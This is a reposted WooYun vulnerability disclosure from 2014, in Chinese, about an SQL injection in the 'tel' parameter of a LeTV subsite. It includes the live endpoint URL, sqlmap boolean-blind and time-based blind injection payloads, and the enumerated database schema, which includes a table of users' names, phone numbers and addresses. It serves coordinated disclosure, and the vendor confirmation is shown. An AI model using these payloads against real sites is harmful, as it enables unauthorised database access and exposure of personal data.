[公开漏洞]乐视网某分站SQL注射漏洞之三

来源:WooYun 浏览:781次 时间:2014-07-09
做网站找雨过天晴工作室
乐视网某分站SQL注射漏洞之三 相关厂商: 乐视网 漏洞作者:魇 提交时间:2014-05-24 11:20 公开时间:2014-07-08 11:21 漏洞类型:SQL注射漏洞 危害等级:高 自评Rank:15 漏洞状态: 厂商已经确认 漏洞来源:http://www.wooyun.org Tags标签: 无 漏洞详情 披露状态:

2014-05-24:细节已通知厂商并且等待厂商处理中
2014-05-24:厂商已经确认,细节仅向厂商公开
2014-06-03:细节向核心白帽子及相关领域专家公开
2014-06-13:细节向普通白帽子公开
2014-06-23:细节向实习白帽子公开
2014-07-08:细节向公众公开

简要描述:

“sql注射”敏感信息

详细说明:

乐视合作

q5.jpg

大鹏?屌丝男士?..

http://baolai.hz.letv.com/php/balaiadd.php?<code>callback=jQuery17106639694047626108_1400897743620&username=wooyun&tel=18688888888&sex=%E7%94%B7&prav=%E5%90%89%E6%9E%97&city=%E9%80%9A%E5%8C%96&addre=%E9%80%9A%E5%8C%96%E9%91%AB%E5%AE%87%E6%B1%BD%E8%BD%A6%E9%94%80%E5%94%AE%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&_=1400897790469

tel参数过滤不严存在注入



---

Place: GET

Parameter: tel

    Type: boolean-based blind

    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY claus

e (RLIKE)

    Payload: callback=jQuery17106639694047626108_1400897743620&username=wooyun&t

el=18688888888' RLIKE (SELECT (CASE WHEN (3539=3539) THEN 18688888888 ELSE 0x28

END)) AND 'Zlvz'='Zlvz&sex=%E7%94%B7&prav=%E5%90%89%E6%9E%97&city=%E9%80%9A%E5%8

C%96&addre=%E9%80%9A%E5%8C%96%E9%91%AB%E5%AE%87%E6%B1%BD%E8%BD%A6%E9%94%80%E5%94

%AE%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&_=1400897790469



    Type: AND/OR time-based blind

    Title: MySQL > 5.0.11 AND time-based blind

    Payload: callback=jQuery17106639694047626108_1400897743620&username=wooyun&t

el=18688888888' AND SLEEP(5) AND 'eyzO'='eyzO&sex=%E7%94%B7&prav=%E5%90%89%E6%9E

%97&city=%E9%80%9A%E5%8C%96&addre=%E9%80%9A%E5%8C%96%E9%91%AB%E5%AE%87%E6%B1%BD%

E8%BD%A6%E9%94%80%E5%94%AE%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&_=1400897790469

---



available databases [2]:

[*] baolai

[*] information_schema



Database: baolai

[3 tables]

+--------+

| baolai |

| juben  |

| video  |

+--------+



Database: baolai

Table: baolai

[8 columns]

+----------+--------------+

| Column   | Type         |

+----------+--------------+

| time     | varchar(100) |

| addre    | varchar(200) |

| city     | varchar(100) |

| id       | int(10)      |

| prav     | varchar(100) |

| sex      | varchar(10)  |

| tel      | varchar(60)  |

| username | varchar(60)  |

+----------+--------------+

漏洞证明: 

Database: baolai

Table: juben

[6 columns]

+----------+----------------+

| Column   | Type           |

+----------+----------------+

| time     | varchar(100)   |

| bianhao  | varchar(10)    |

| cont     | varchar(10000) |

| num      | int(10)        |

| title    | varchar(100)   |

| username | varchar(100)   |

+----------+----------------+



Database: baolai

Table: video

[2 columns]

+--------+-------------+

| Column | Type        |

+--------+-------------+

| id     | varchar(10) |

| num    | int(10)     |

+--------+-------------+

修复方案:

过滤?

版权声明:转载请注明来源 魇@乌云 漏洞回应 厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-05-24 11:53

厂商回复:

谢谢对我们安全的关注,尽快修复~

最新状态:

暂无